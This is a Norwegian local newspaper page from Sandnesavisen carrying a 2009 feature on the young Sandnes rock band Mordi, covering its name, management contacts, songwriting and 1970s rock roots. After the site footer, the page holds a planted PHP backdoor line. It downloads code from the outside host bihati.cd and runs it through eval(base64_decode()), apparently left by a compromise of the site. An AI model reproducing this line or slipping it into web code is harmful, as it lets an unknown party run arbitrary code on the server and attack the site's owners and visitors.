GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vær - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bøker
Musikk
Film
Byen vår
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrått
Figgjo
Ganddal
Hana
Høle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Håndball
Kultur
Politikk
Økonomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersåk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Båt
Tog
Syttitallet i kjelleren på Trones
Skrevet av Trond Anfinnsen   
torsdag 02. juli 2009
I en kjeller på Trones jobber tre unge gutter knallhardt på gitar, trommer, bass og sang. På veggene henger det plakater av legendariske storheter fra syttitallet: Led Zeppelin, Black Sabbath, Jimi Hendrix og The Who. Ingen tvil om hvor Mordi har røttene sine.

 

mordi
På tross av sin unge alder har medlemmene i Sandnesbandet Mordi allerede rukket å vekke oppmerksomhet både blant publikum og bransjefolk. Inspirasjonen henter de fra syttitallet. Fra venstre: Bassist Lars Erik Haukedal Andreassen, trommis Ole Tollefsen og vokalist/gitarist Brage Joachimsen Pedersen. Foto: Rune Thoresen

Det er vanskelig å la være å begynne med spørsmålet: - Hvorfor ”Mordi” (altså normert bokmål: ”Moren din”) som bandnavn? - Hm, skal vi se om vi klarer å finne på en historie raskt, sier bassist Lars Erik Haukedal Andreassen, og kikker på de to andre bandkompisene. - Vi støtter mødre, Mødrenes landsforening, Samhandlende mødre. Nei, vet du hva, det var bare fordi vi trengte et navn. Vi fikk et tips fra en som spilte i dette bandet før, og så ble det bare sånn, sier Andreassen. Både han og gitarist / sanger Brage Joachimsen Pedersen og trommis Ole Tollefsen understreker at de er på jakt etter et nytt navn, og at de er lydhøre for forslag. - Bare ikke ”Fardin”, samstemmer de, og ler. - Vi trenger et navn som litt mer reflekterer musikken vi spiller i stedet for et tullete navn.

Great Moments

Med sin rå og litt uhøvlede musikk har Mordi rukket å fange oppmerksomheten til rockepublikummet i distriktet. Også bransjefolk i Stavanger har åpnet både ørene og dørene for de ufriserte guttene fra Sandnes. Børre Jacobsen i Stavanger Rock mener Mordi er en uslepen diamant, og at det varmer hans syttitallsrockete hjerte å høre de unge mennene presentere sitt materiale. Stein Bjelland i managementselskapet Great Moments har blitt så begeistret at han rett og slett har innlemmet Mordi i sin stall. - De har trukket oss inn i musikkmiljøet i Stavanger, og skaffet oss mange nyttige kontakter. En gang i måneden møtes vi hos ham. Vi snakker om framtidige mål, og hva vi har gjort den siste måneden. De har også fikset spillejobber for oss, sier en begeistret Andreassen, og lister opp: - Vi har spilt på både Stortinget i Oslo, på Cementen og på Checkpoint. Når vi får mange spillejobber, møter vi også mange viktige folk i musikkbransjen. - Så har vi også kommet i kontakt med Janove Ottesen i Kaizers, legger Tollefsen stolt til. - Han har gitt signaler om at han vil fremme et videre samarbeid.

Sirkel for låtskrivere

De tre rockerne har også vært med i Songwriters Circle. Dette er et prosjekt som Arne Hovda, tidligere keyboardist i bandet The Getawaypeople driver, og som skal fremme lokale musikeres kompetanse innen låtskriving. - Vi var sammen med tre andre band. De var mer orientert omkassegitar, mens vi er mer et riffband, sier Tollefsen, og legger til at det krever litt andre ferdigheter å lage tekst og melodi til riffbasert musikk. - Hva med plateutgivelse? - Vi har ingen konkrete planer om å gi ut plate. Vi har gitt ut noen smådemoer, men må nok komme lenger med låtmaterialet før vi kan tenke på plate, sier Andreassen. - Men det hadde vært kjekt å en gang få lage en plate, drømmer Pedersen.

Syttitallet i bunn

Dagens bandbesetning begynte å spille sammen i 2007. De tre medlemmene prøver iherdig, men uten særlig hell, å understreke at de ikke vil ha et kulturskolestempel på seg. Det er ikke vanskelig å forstå at kulturskolen har vært en felles arena for de tre. - Hva hører dere på av musikk? - Jeg hører egentlig på alt mulig, sier Andreassen, og Pedersen legger til at også han lytter til mye forskjellig, men at syttitallsrocken nok ligger i bunn for alle tre. Av en eller annen grunn kommer navnet Coldplay på banen, og de tøffe rockerne gir klart uttrykk for en viss redsel for å miste rocke-kred. Det er tydelig at fin og melodiøs pop også har fått innpass i Mordi, men en plass går grensen: - Vi hører på det meste, men ikke überkommersiell puppepopp. - Som? - VG-listen, og den slags. Det blir for kjedelig, samstemmer de tre.

Først musikk, så tekst

 - Hvordan går dere fram når dere lager musikk? - Diskusjon er et mye brukt virkemiddel. I begynnelsen var det mye tull, og vi ble ikke enige så fort. Alle ville gjøre forskjellige ting. Nå har vi blitt mer samkjørte, sier Pedersen, og Tollefsen tilføyer: - Av og til bare spiller vi det samme uten at vi har avtalt det. - Vi er flinke til å kommunisere, og dersom det er noe en av oss ikke liker, så kompromisser vi, sier Andreassen. - Hva med tekst da? - Vi ser for oss figurer i sangene. Musikken skaper bilder, og så skriver vi ut fra det, sier Tollefsen. Andreassen forklarer rekkefølgen i arbeidet: - I stedet for å skrive en tekst og så komponere en sang, så går vi den andre vegen. Vi lager først musikken, så finner vi stemningen i sangen, og tilpasser en tekst etter det. - Lars Erik har skrevet mest tekst, og så endrer Brage på dem, og tilpasser dem rytmisk sånn at de passer bedre til sangen, forklarer Tollefsen. - Hva dreier tekstene seg om? - Folk. Det er interessant med folk. Bare tenk når du går på gaten og ser på folk, så er alle forskjellige, sier Andreassen, men de tre understreker raskt at de ikke går rundt i gatene og stirrer på folk.

Ekte kjellerrock

 - Er det på tide med en musikalsk smakebit? - Ja, det må vel gå, sier guttene, og plukker opp trommestikker, instrumenter og effektbokser. Vaktsomme blikk fra legendene på veggene ser til at guttene holder seg tro mot røttene idet Tollefsen teller opp med trommestikkene. Så braker det løs. Det er nesten som om Jimmy Page på veggen nikker bekreftende med. Det er tøffe riff, tett komp og bestemte stopp og markeringer. Pedersen lager atmosfæriske lyder med gitaren samtidig som han vrenger sjelen i mikrofonen. Han river og sliter i strengene, bruker effektboksene på golvet flittig, og lar lydene fra gitaren henge lenge og nesten leve sitt eget liv. Den hvite luggen til Tollefsen henger over trommesettet mens han jobber intenst over hele settet. I bunn ligger en over gjennomsnittet stor stortromme og danner en solid grunnmur under resten av den upolerte organiserte støyen fra de to andre. Vi forstår at både musikkfolk i Stavanger og distriktets rockepublikum for øvrig har forventninger til den videre utviklingen i kjelleren på Trones.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));